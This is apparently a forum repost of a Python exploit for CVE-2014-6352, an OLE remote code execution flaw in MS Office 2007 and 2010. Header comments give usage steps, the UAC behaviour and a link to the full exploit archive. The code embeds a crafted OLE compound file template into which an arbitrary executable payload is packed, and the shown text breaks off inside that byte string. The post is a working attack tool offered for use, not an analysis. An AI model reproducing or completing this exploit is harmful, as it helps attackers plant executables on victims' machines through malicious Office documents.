Everything posted by Nytro

  1. MS Office 2007 and 2010 - OLE Arbitrary Command Execution

#
# Full exploit: http://www.exploit-db.com/sploits/35216.rar
#
# CVE-2014-6352 OLE Remote Code Execution
# Author: Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
# Advanced Hacking Trainings - http://training.aslitsecurity.com
# Web - http://www.aslitsecurity.com/
# Blog - http://www.aslitsecurity.blogspot.com/
# Tested on Win7 with Office 2007 and 2010. The exploit will not trigger a UAC
# warning if the user account is an administrator; otherwise a UAC warning appears.
# No .inf file is required for this exploit.
# The executable payload must be smaller than 400 KB.
# Python 2.7 is required.
# The folder "temp" must be in the same directory as this Python file.
# Usage: python.exe CVE-2014-6352.py <name of exe>

#!/usr/bin/python
import os
import sys
import shutil

# Pre-built OLE compound file (CFB) containing an Ole10Native stream;
# the payload EXE is appended to it below.
oleole = (
"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3E\x00\x03\x00\xFE\xFF\x09\x00\x06\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\xFE\xFF\xFF\xFF\x00\x00\x00\x00"
"\xFE\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00"
"\x00\x00\x08\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFD\xFF\xFF\xFF\xFE\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF"
"\xFD\xFF\xFF\xFF\x0A\x00\x00\x00\x0B\x00\x00\x00\x0C\x00\x00\x00\x0D\x00\x00\x00\x0E\x00\x00\x00\x0F\x00\x00\x00\x10\x00\x00\x00\x11\x00"
"\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x18\x00\x00\x00\x19\x00\x00\x00"
"\x1A\x00\x00\x00\x1B\x00\x00\x00\x1C\x00\x00\x00\x1D\x00\x00\x00\x1E\x00\x00\x00\x1F\x00\x00\x00\x20\x00\x00\x00\x21\x00\x00\x00\x22\x00"
"\x00\x00\x23\x00\x00\x00\x24\x00\x00\x00\x25\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\x28\x00\x00\x00\x29\x00\x00\x00\x2A\x00\x00\x00" "\x2B\x00\x00\x00\x2C\x00\x00\x00\x2D\x00\x00\x00\x2E\x00\x00\x00\x2F\x00\x00\x00\x30\x00\x00\x00\x31\x00\x00\x00\x32\x00\x00\x00\x33\x00" "\x00\x00\x34\x00\x00\x00\x35\x00\x00\x00\x36\x00\x00\x00\x37\x00\x00\x00\x38\x00\x00\x00\x39\x00\x00\x00\x3A\x00\x00\x00\x3B\x00\x00\x00" "\x3C\x00\x00\x00\x3D\x00\x00\x00\x3E\x00\x00\x00\x3F\x00\x00\x00\x40\x00\x00\x00\x41\x00\x00\x00\x42\x00\x00\x00\x43\x00\x00\x00\x44\x00" "\x00\x00\x45\x00\x00\x00\x46\x00\x00\x00\x47\x00\x00\x00\x48\x00\x00\x00\x49\x00\x00\x00\x4A\x00\x00\x00\x4B\x00\x00\x00\x4C\x00\x00\x00" "\x4D\x00\x00\x00\x4E\x00\x00\x00\x4F\x00\x00\x00\x50\x00\x00\x00\x51\x00\x00\x00\x52\x00\x00\x00\x53\x00\x00\x00\x54\x00\x00\x00\x55\x00" "\x00\x00\x56\x00\x00\x00\x57\x00\x00\x00\x58\x00\x00\x00\x59\x00\x00\x00\x5A\x00\x00\x00\x5B\x00\x00\x00\x5C\x00\x00\x00\x5D\x00\x00\x00" "\x5E\x00\x00\x00\x5F\x00\x00\x00\x60\x00\x00\x00\x61\x00\x00\x00\x62\x00\x00\x00\x63\x00\x00\x00\x64\x00\x00\x00\x65\x00\x00\x00\x66\x00" "\x00\x00\x67\x00\x00\x00\x68\x00\x00\x00\x69\x00\x00\x00\x6A\x00\x00\x00\x6B\x00\x00\x00\x6C\x00\x00\x00\x6D\x00\x00\x00\x6E\x00\x00\x00" "\x6F\x00\x00\x00\x70\x00\x00\x00\x71\x00\x00\x00\x72\x00\x00\x00\x73\x00\x00\x00\x74\x00\x00\x00\x75\x00\x00\x00\x76\x00\x00\x00\x77\x00" "\x00\x00\x78\x00\x00\x00\x79\x00\x00\x00\x7A\x00\x00\x00\x7B\x00\x00\x00\x7C\x00\x00\x00\x7D\x00\x00\x00\x7E\x00\x00\x00\x7F\x00\x00\x00" "\x80\x00\x00\x00\x52\x00\x6F\x00\x6F\x00\x74\x00\x20\x00\x45\x00\x6E\x00\x74\x00\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x16\x00\x05\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x01\x00\x00\x00\x0C\x00\x03\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD0\x8D\xED\x42\xD9\xF8\xCF\x01\xFE\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x4F\x00" "\x6C\x00\x65\x00\x31\x00\x30\x00\x4E\x00\x61\x00\x74\x00\x69\x00\x76\x00\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1A\x00\x02\x01\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x1D\x91\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00" 
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x81\x00\x00\x00\x82\x00\x00\x00\x83\x00\x00\x00\x84\x00\x00\x00\x85\x00\x00\x00\x86\x00\x00\x00\x87\x00\x00\x00" "\x88\x00\x00\x00\x89\x00\x00\x00\x8A\x00\x00\x00\x8B\x00\x00\x00\x8C\x00\x00\x00\x8D\x00\x00\x00\x8E\x00\x00\x00\x8F\x00\x00\x00\x90\x00" "\x00\x00\x91\x00\x00\x00\x92\x00\x00\x00\x93\x00\x00\x00\x94\x00\x00\x00\x95\x00\x00\x00\x96\x00\x00\x00\x97\x00\x00\x00\x98\x00\x00\x00" "\x99\x00\x00\x00\x9A\x00\x00\x00\x9B\x00\x00\x00\x9C\x00\x00\x00\x9D\x00\x00\x00\x9E\x00\x00\x00\x9F\x00\x00\x00\xA0\x00\x00\x00\xA1\x00" "\x00\x00\xA2\x00\x00\x00\xA3\x00\x00\x00\xA4\x00\x00\x00\xA5\x00\x00\x00\xA6\x00\x00\x00\xA7\x00\x00\x00\xA8\x00\x00\x00\xA9\x00\x00\x00" "\xAA\x00\x00\x00\xAB\x00\x00\x00\xAC\x00\x00\x00\xAD\x00\x00\x00\xAE\x00\x00\x00\xAF\x00\x00\x00\xB0\x00\x00\x00\xB1\x00\x00\x00\xB2\x00" "\x00\x00\xB3\x00\x00\x00\xB4\x00\x00\x00\xB5\x00\x00\x00\xB6\x00\x00\x00\xB7\x00\x00\x00\xB8\x00\x00\x00\xB9\x00\x00\x00\xBA\x00\x00\x00" "\xBB\x00\x00\x00\xBC\x00\x00\x00\xBD\x00\x00\x00\xBE\x00\x00\x00\xBF\x00\x00\x00\xC0\x00\x00\x00\xC1\x00\x00\x00\xC2\x00\x00\x00\xC3\x00" "\x00\x00\xC4\x00\x00\x00\xC5\x00\x00\x00\xC6\x00\x00\x00\xC7\x00\x00\x00\xC8\x00\x00\x00\xC9\x00\x00\x00\xCA\x00\x00\x00\xCB\x00\x00\x00" "\xCC\x00\x00\x00\xCD\x00\x00\x00\xCE\x00\x00\x00\xCF\x00\x00\x00\xD0\x00\x00\x00\xD1\x00\x00\x00\xD2\x00\x00\x00\xD3\x00\x00\x00\xD4\x00" "\x00\x00\xD5\x00\x00\x00\xD6\x00\x00\x00\xD7\x00\x00\x00\xD8\x00\x00\x00\xD9\x00\x00\x00\xDA\x00\x00\x00\xDB\x00\x00\x00\xDC\x00\x00\x00" "\xDD\x00\x00\x00\xDE\x00\x00\x00\xDF\x00\x00\x00\xE0\x00\x00\x00\xE1\x00\x00\x00\xE2\x00\x00\x00\xE3\x00\x00\x00\xE4\x00\x00\x00\xE5\x00" "\x00\x00\xE6\x00\x00\x00\xE7\x00\x00\x00\xE8\x00\x00\x00\xE9\x00\x00\x00\xEA\x00\x00\x00\xEB\x00\x00\x00\xEC\x00\x00\x00\xED\x00\x00\x00" "\xEE\x00\x00\x00\xEF\x00\x00\x00\xF0\x00\x00\x00\xF1\x00\x00\x00\xF2\x00\x00\x00\xF3\x00\x00\x00\xF4\x00\x00\x00\xF5\x00\x00\x00\xF6\x00" "\x00\x00\xF7\x00\x00\x00\xF8\x00\x00\x00\xF9\x00\x00\x00\xFA\x00\x00\x00\xFB\x00\x00\x00\xFC\x00\x00\x00\xFD\x00\x00\x00\xFE\x00\x00\x00" "\xFF\x00\x00\x00\x00\x01\x00\x00\x01\x01\x00\x00\x02\x01\x00\x00\x03\x01\x00\x00\x04\x01\x00\x00\x05\x01\x00\x00\x06\x01\x00\x00\x07\x01" "\x00\x00\x08\x01\x00\x00\x09\x01\x00\x00\x0A\x01\x00\x00\x0B\x01\x00\x00\x0C\x01\x00\x00\x0D\x01\x00\x00\x0E\x01\x00\x00\x0F\x01\x00\x00" "\x10\x01\x00\x00\x11\x01\x00\x00\x12\x01\x00\x00\x13\x01\x00\x00\x14\x01\x00\x00\x15\x01\x00\x00\x16\x01\x00\x00\x17\x01\x00\x00\x18\x01" "\x00\x00\x19\x01\x00\x00\x1A\x01\x00\x00\x1B\x01\x00\x00\x1C\x01\x00\x00\x1D\x01\x00\x00\x1E\x01\x00\x00\x1F\x01\x00\x00\x20\x01\x00\x00" "\x21\x01\x00\x00\x22\x01\x00\x00\x23\x01\x00\x00\x24\x01\x00\x00\x25\x01\x00\x00\x26\x01\x00\x00\x27\x01\x00\x00\x28\x01\x00\x00\x29\x01" "\x00\x00\x2A\x01\x00\x00\x2B\x01\x00\x00\x2C\x01\x00\x00\x2D\x01\x00\x00\x2E\x01\x00\x00\x2F\x01\x00\x00\x30\x01\x00\x00\x31\x01\x00\x00" "\x32\x01\x00\x00\x33\x01\x00\x00\x34\x01\x00\x00\x35\x01\x00\x00\x36\x01\x00\x00\x37\x01\x00\x00\x38\x01\x00\x00\x39\x01\x00\x00\x3A\x01" "\x00\x00\x3B\x01\x00\x00\x3C\x01\x00\x00\x3D\x01\x00\x00\x3E\x01\x00\x00\x3F\x01\x00\x00\x40\x01\x00\x00\x41\x01\x00\x00\x42\x01\x00\x00" "\x43\x01\x00\x00\x44\x01\x00\x00\x45\x01\x00\x00\x46\x01\x00\x00\x47\x01\x00\x00\x48\x01\x00\x00\x49\x01\x00\x00\x4A\x01\x00\x00\x4B\x01" 
"\x00\x00\x4C\x01\x00\x00\x4D\x01\x00\x00\x4E\x01\x00\x00\x4F\x01\x00\x00\x50\x01\x00\x00\x51\x01\x00\x00\x52\x01\x00\x00\x53\x01\x00\x00" "\x54\x01\x00\x00\x55\x01\x00\x00\x56\x01\x00\x00\x57\x01\x00\x00\x58\x01\x00\x00\x59\x01\x00\x00\x5A\x01\x00\x00\x5B\x01\x00\x00\x5C\x01" "\x00\x00\x5D\x01\x00\x00\x5E\x01\x00\x00\x5F\x01\x00\x00\x60\x01\x00\x00\x61\x01\x00\x00\x62\x01\x00\x00\x63\x01\x00\x00\x64\x01\x00\x00" "\x65\x01\x00\x00\x66\x01\x00\x00\x67\x01\x00\x00\x68\x01\x00\x00\x69\x01\x00\x00\x6A\x01\x00\x00\x6B\x01\x00\x00\x6C\x01\x00\x00\x6D\x01" "\x00\x00\x6E\x01\x00\x00\x6F\x01\x00\x00\x70\x01\x00\x00\x71\x01\x00\x00\x72\x01\x00\x00\x73\x01\x00\x00\x74\x01\x00\x00\x75\x01\x00\x00" "\x76\x01\x00\x00\x77\x01\x00\x00\x78\x01\x00\x00\x79\x01\x00\x00\x7A\x01\x00\x00\x7B\x01\x00\x00\x7C\x01\x00\x00\x7D\x01\x00\x00\x7E\x01" "\x00\x00\x7F\x01\x00\x00\x80\x01\x00\x00\x81\x01\x00\x00\x82\x01\x00\x00\x83\x01\x00\x00\x84\x01\x00\x00\x85\x01\x00\x00\x86\x01\x00\x00" "\x87\x01\x00\x00\x88\x01\x00\x00\x89\x01\x00\x00\x8A\x01\x00\x00\x8B\x01\x00\x00\x8C\x01\x00\x00\x8D\x01\x00\x00\x8E\x01\x00\x00\x8F\x01" "\x00\x00\x90\x01\x00\x00\x91\x01\x00\x00\x92\x01\x00\x00\x93\x01\x00\x00\x94\x01\x00\x00\x95\x01\x00\x00\x96\x01\x00\x00\x97\x01\x00\x00" "\x98\x01\x00\x00\x99\x01\x00\x00\x9A\x01\x00\x00\x9B\x01\x00\x00\x9C\x01\x00\x00\x9D\x01\x00\x00\x9E\x01\x00\x00\x9F\x01\x00\x00\xA0\x01" "\x00\x00\xA1\x01\x00\x00\xA2\x01\x00\x00\xA3\x01\x00\x00\xA4\x01\x00\x00\xA5\x01\x00\x00\xA6\x01\x00\x00\xA7\x01\x00\x00\xA8\x01\x00\x00" "\xA9\x01\x00\x00\xAA\x01\x00\x00\xAB\x01\x00\x00\xAC\x01\x00\x00\xAD\x01\x00\x00\xAE\x01\x00\x00\xAF\x01\x00\x00\xB0\x01\x00\x00\xB1\x01" "\x00\x00\xB2\x01\x00\x00\xB3\x01\x00\x00\xB4\x01\x00\x00\xB5\x01\x00\x00\xB6\x01\x00\x00\xB7\x01\x00\x00\xB8\x01\x00\x00\xB9\x01\x00\x00" "\xBA\x01\x00\x00\xBB\x01\x00\x00\xBC\x01\x00\x00\xBD\x01\x00\x00\xBE\x01\x00\x00\xBF\x01\x00\x00\xC0\x01\x00\x00\xC1\x01\x00\x00\xC2\x01" "\x00\x00\xC3\x01\x00\x00\xC4\x01\x00\x00\xC5\x01\x00\x00\xC6\x01\x00\x00\xC7\x01\x00\x00\xC8\x01\x00\x00\xC9\x01\x00\x00\xCA\x01\x00\x00" "\xCB\x01\x00\x00\xCC\x01\x00\x00\xCD\x01\x00\x00\xCE\x01\x00\x00\xCF\x01\x00\x00\xD0\x01\x00\x00\xD1\x01\x00\x00\xD2\x01\x00\x00\xD3\x01" "\x00\x00\xD4\x01\x00\x00\xD5\x01\x00\x00\xD6\x01\x00\x00\xD7\x01\x00\x00\xD8\x01\x00\x00\xD9\x01\x00\x00\xDA\x01\x00\x00\xDB\x01\x00\x00" "\xDC\x01\x00\x00\xDD\x01\x00\x00\xDE\x01\x00\x00\xDF\x01\x00\x00\xE0\x01\x00\x00\xE1\x01\x00\x00\xE2\x01\x00\x00\xE3\x01\x00\x00\xE4\x01" "\x00\x00\xE5\x01\x00\x00\xE6\x01\x00\x00\xE7\x01\x00\x00\xE8\x01\x00\x00\xE9\x01\x00\x00\xEA\x01\x00\x00\xEB\x01\x00\x00\xEC\x01\x00\x00" "\xED\x01\x00\x00\xEE\x01\x00\x00\xEF\x01\x00\x00\xF0\x01\x00\x00\xF1\x01\x00\x00\xF2\x01\x00\x00\xF3\x01\x00\x00\xF4\x01\x00\x00\xF5\x01" "\x00\x00\xF6\x01\x00\x00\xF7\x01\x00\x00\xF8\x01\x00\x00\xF9\x01\x00\x00\xFA\x01\x00\x00\xFB\x01\x00\x00\xFC\x01\x00\x00\xFD\x01\x00\x00" "\xFE\x01\x00\x00\xFF\x01\x00\x00\x00\x02\x00\x00\x01\x02\x00\x00\x02\x02\x00\x00\x03\x02\x00\x00\x04\x02\x00\x00\x05\x02\x00\x00\x06\x02" "\x00\x00\x07\x02\x00\x00\x08\x02\x00\x00\x09\x02\x00\x00\x0A\x02\x00\x00\x0B\x02\x00\x00\x0C\x02\x00\x00\x0D\x02\x00\x00\x0E\x02\x00\x00" "\x0F\x02\x00\x00\x10\x02\x00\x00\x11\x02\x00\x00\x12\x02\x00\x00\x13\x02\x00\x00\x14\x02\x00\x00\x15\x02\x00\x00\x16\x02\x00\x00\x17\x02" "\x00\x00\x18\x02\x00\x00\x19\x02\x00\x00\x1A\x02\x00\x00\x1B\x02\x00\x00\x1C\x02\x00\x00\x1D\x02\x00\x00\x1E\x02\x00\x00\x1F\x02\x00\x00" 
"\x20\x02\x00\x00\x21\x02\x00\x00\x22\x02\x00\x00\x23\x02\x00\x00\x24\x02\x00\x00\x25\x02\x00\x00\x26\x02\x00\x00\x27\x02\x00\x00\x28\x02" "\x00\x00\x29\x02\x00\x00\x2A\x02\x00\x00\x2B\x02\x00\x00\x2C\x02\x00\x00\x2D\x02\x00\x00\x2E\x02\x00\x00\x2F\x02\x00\x00\x30\x02\x00\x00" "\x31\x02\x00\x00\x32\x02\x00\x00\x33\x02\x00\x00\x34\x02\x00\x00\x35\x02\x00\x00\x36\x02\x00\x00\x37\x02\x00\x00\x38\x02\x00\x00\x39\x02" "\x00\x00\x3A\x02\x00\x00\x3B\x02\x00\x00\x3C\x02\x00\x00\x3D\x02\x00\x00\x3E\x02\x00\x00\x3F\x02\x00\x00\x40\x02\x00\x00\x41\x02\x00\x00" "\x42\x02\x00\x00\x43\x02\x00\x00\x44\x02\x00\x00\x45\x02\x00\x00\x46\x02\x00\x00\x47\x02\x00\x00\x48\x02\x00\x00\x49\x02\x00\x00\x4A\x02" "\x00\x00\x4B\x02\x00\x00\x4C\x02\x00\x00\x4D\x02\x00\x00\x4E\x02\x00\x00\x4F\x02\x00\x00\x50\x02\x00\x00\x51\x02\x00\x00\x52\x02\x00\x00" "\x53\x02\x00\x00\x54\x02\x00\x00\x55\x02\x00\x00\x56\x02\x00\x00\x57\x02\x00\x00\x58\x02\x00\x00\x59\x02\x00\x00\x5A\x02\x00\x00\x5B\x02" "\x00\x00\x5C\x02\x00\x00\x5D\x02\x00\x00\x5E\x02\x00\x00\x5F\x02\x00\x00\x60\x02\x00\x00\x61\x02\x00\x00\x62\x02\x00\x00\x63\x02\x00\x00" "\x64\x02\x00\x00\x65\x02\x00\x00\x66\x02\x00\x00\x67\x02\x00\x00\x68\x02\x00\x00\x69\x02\x00\x00\x6A\x02\x00\x00\x6B\x02\x00\x00\x6C\x02" "\x00\x00\x6D\x02\x00\x00\x6E\x02\x00\x00\x6F\x02\x00\x00\x70\x02\x00\x00\x71\x02\x00\x00\x72\x02\x00\x00\x73\x02\x00\x00\x74\x02\x00\x00" "\x75\x02\x00\x00\x76\x02\x00\x00\x77\x02\x00\x00\x78\x02\x00\x00\x79\x02\x00\x00\x7A\x02\x00\x00\x7B\x02\x00\x00\x7C\x02\x00\x00\x7D\x02" "\x00\x00\x7E\x02\x00\x00\x7F\x02\x00\x00\x80\x02\x00\x00\x81\x02\x00\x00\x82\x02\x00\x00\x83\x02\x00\x00\x84\x02\x00\x00\x85\x02\x00\x00" "\x86\x02\x00\x00\x87\x02\x00\x00\x88\x02\x00\x00\x89\x02\x00\x00\x8A\x02\x00\x00\x8B\x02\x00\x00\x8C\x02\x00\x00\x8D\x02\x00\x00\x8E\x02" "\x00\x00\x8F\x02\x00\x00\x90\x02\x00\x00\x91\x02\x00\x00\x92\x02\x00\x00\x93\x02\x00\x00\x94\x02\x00\x00\x95\x02\x00\x00\x96\x02\x00\x00" "\x97\x02\x00\x00\x98\x02\x00\x00\x99\x02\x00\x00\x9A\x02\x00\x00\x9B\x02\x00\x00\x9C\x02\x00\x00\x9D\x02\x00\x00\x9E\x02\x00\x00\x9F\x02" "\x00\x00\xA0\x02\x00\x00\xA1\x02\x00\x00\xA2\x02\x00\x00\xA3\x02\x00\x00\xA4\x02\x00\x00\xA5\x02\x00\x00\xA6\x02\x00\x00\xA7\x02\x00\x00" "\xA8\x02\x00\x00\xA9\x02\x00\x00\xAA\x02\x00\x00\xAB\x02\x00\x00\xAC\x02\x00\x00\xAD\x02\x00\x00\xAE\x02\x00\x00\xAF\x02\x00\x00\xB0\x02" "\x00\x00\xB1\x02\x00\x00\xB2\x02\x00\x00\xB3\x02\x00\x00\xB4\x02\x00\x00\xB5\x02\x00\x00\xB6\x02\x00\x00\xB7\x02\x00\x00\xB8\x02\x00\x00" "\xB9\x02\x00\x00\xBA\x02\x00\x00\xBB\x02\x00\x00\xBC\x02\x00\x00\xBD\x02\x00\x00\xBE\x02\x00\x00\xBF\x02\x00\x00\xC0\x02\x00\x00\xC1\x02" "\x00\x00\xC2\x02\x00\x00\xC3\x02\x00\x00\xC4\x02\x00\x00\xC5\x02\x00\x00\xC6\x02\x00\x00\xC7\x02\x00\x00\xC8\x02\x00\x00\xC9\x02\x00\x00" "\xCA\x02\x00\x00\xCB\x02\x00\x00\xCC\x02\x00\x00\xCD\x02\x00\x00\xCE\x02\x00\x00\xCF\x02\x00\x00\xD0\x02\x00\x00\xD1\x02\x00\x00\xD2\x02" "\x00\x00\xD3\x02\x00\x00\xD4\x02\x00\x00\xD5\x02\x00\x00\xD6\x02\x00\x00\xD7\x02\x00\x00\xD8\x02\x00\x00\xD9\x02\x00\x00\xDA\x02\x00\x00" "\xDB\x02\x00\x00\xDC\x02\x00\x00\xDD\x02\x00\x00\xDE\x02\x00\x00\xDF\x02\x00\x00\xE0\x02\x00\x00\xE1\x02\x00\x00\xE2\x02\x00\x00\xE3\x02" "\x00\x00\xE4\x02\x00\x00\xE5\x02\x00\x00\xE6\x02\x00\x00\xE7\x02\x00\x00\xE8\x02\x00\x00\xE9\x02\x00\x00\xEA\x02\x00\x00\xEB\x02\x00\x00" "\xEC\x02\x00\x00\xED\x02\x00\x00\xEE\x02\x00\x00\xEF\x02\x00\x00\xF0\x02\x00\x00\xF1\x02\x00\x00\xF2\x02\x00\x00\xF3\x02\x00\x00\xF4\x02" 
"\x00\x00\xF5\x02\x00\x00\xF6\x02\x00\x00\xF7\x02\x00\x00\xF8\x02\x00\x00\xF9\x02\x00\x00\xFA\x02\x00\x00\xFB\x02\x00\x00\xFC\x02\x00\x00" "\xFD\x02\x00\x00\xFE\x02\x00\x00\xFF\x02\x00\x00\x00\x03\x00\x00\x01\x03\x00\x00\x02\x03\x00\x00\x03\x03\x00\x00\x04\x03\x00\x00\x05\x03" "\x00\x00\x06\x03\x00\x00\x07\x03\x00\x00\x08\x03\x00\x00\x09\x03\x00\x00\x0A\x03\x00\x00\x0B\x03\x00\x00\x0C\x03\x00\x00\x0D\x03\x00\x00" "\x0E\x03\x00\x00\x0F\x03\x00\x00\x10\x03\x00\x00\x11\x03\x00\x00\x12\x03\x00\x00\x13\x03\x00\x00\x14\x03\x00\x00\x15\x03\x00\x00\x16\x03" "\x00\x00\x17\x03\x00\x00\x18\x03\x00\x00\x19\x03\x00\x00\x1A\x03\x00\x00\x1B\x03\x00\x00\x1C\x03\x00\x00\x1D\x03\x00\x00\x1E\x03\x00\x00" "\x1F\x03\x00\x00\x20\x03\x00\x00\x21\x03\x00\x00\x22\x03\x00\x00\x23\x03\x00\x00\x24\x03\x00\x00\x25\x03\x00\x00\x26\x03\x00\x00\x27\x03" "\x00\x00\x28\x03\x00\x00\x29\x03\x00\x00\x2A\x03\x00\x00\x2B\x03\x00\x00\x2C\x03\x00\x00\x2D\x03\x00\x00\x2E\x03\x00\x00\x2F\x03\x00\x00" "\x30\x03\x00\x00\x31\x03\x00\x00\x32\x03\x00\x00\x33\x03\x00\x00\x34\x03\x00\x00\x35\x03\x00\x00\x36\x03\x00\x00\x37\x03\x00\x00\x38\x03" "\x00\x00\x39\x03\x00\x00\x3A\x03\x00\x00\x3B\x03\x00\x00\x3C\x03\x00\x00\x3D\x03\x00\x00\x3E\x03\x00\x00\x3F\x03\x00\x00\x40\x03\x00\x00" "\x41\x03\x00\x00\x42\x03\x00\x00\x43\x03\x00\x00\x44\x03\x00\x00\x45\x03\x00\x00\x46\x03\x00\x00\x47\x03\x00\x00\x48\x03\x00\x00\x49\x03" 